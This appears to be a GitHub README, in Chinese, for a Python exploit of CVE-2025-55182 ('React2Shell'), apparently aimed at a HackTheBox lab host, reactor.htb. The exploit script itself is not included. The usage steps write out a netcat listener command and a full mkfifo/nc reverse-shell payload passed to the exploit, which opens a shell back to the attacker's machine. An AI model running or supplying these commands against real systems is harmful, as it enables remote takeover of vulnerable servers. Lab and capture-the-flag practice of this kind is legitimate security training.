AkhmadKholmurodov/React2Shell_Exploit

# React2Shell_Exploit CVE-2025-55182 我编写了一个简单的 react2shell CVE-2025-55182 Python exploit 使用方法 1. 保存脚本：将上面的代码保存为 exploit.py。 2. 更新 Hosts：确保在你的 /etc/hosts 文件中 reactor.htb 解析到目标 IP。 echo " reactor.htb" | sudo tee -a /etc/hosts 3. 启动监听器：打开一个终端来接收反弹 shell。 nc -lvnp 4444 4. 执行 Exploit：使用反弹 shell payload 运行该脚本。 python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f" 5. 将 替换为你的 tun0 IP 地址。

标签：CISA项目, Python, 反弹Shell, 应用安全, 无后门, 逆向工具